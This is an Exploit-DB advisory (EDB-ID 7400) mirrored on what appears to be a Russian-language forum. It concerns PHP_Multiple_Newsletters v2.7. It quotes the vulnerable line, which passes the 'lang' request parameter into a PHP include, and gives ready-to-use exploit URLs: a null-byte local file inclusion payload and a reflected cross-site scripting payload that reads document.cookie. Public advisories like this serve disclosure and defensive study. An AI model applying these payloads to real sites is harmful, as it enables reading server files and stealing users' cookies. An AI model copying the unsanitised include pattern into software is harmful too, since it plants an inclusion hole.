- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7400
- Проверка EDB
-
- Пройдено
- Автор
- AHMADBADY
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-5570 cve-2008-5566
- Дата публикации
- 2008-12-09
Код:
****(Lfi/xss)****
script: PHP_Multiple_Newsletters v2.7
***************************************************************************
download from:http://www.phpmultiplenewsletters.com/modules/phpmultiplenewsletters.com/dist/free/PHP_Multiple_Newsletters_v2.7.zip
***************************************************************************
vul:/index.php
line 36:
include ('language/'..$_REQUEST['lang'].'.php');
***************************************************
xpl:
www.site.com/path/index.php?lang=[Lfi]%00
xss:
www.site.com/path/index.php/>"><ScRiPt>alert(document.cookie)</ScRiPt>
...................................................
Author: ahmadbady from:iran
my mail: [email protected]
***************************************************
# milw0rm.com [2008-12-09]- Источник
- www.exploit-db.com
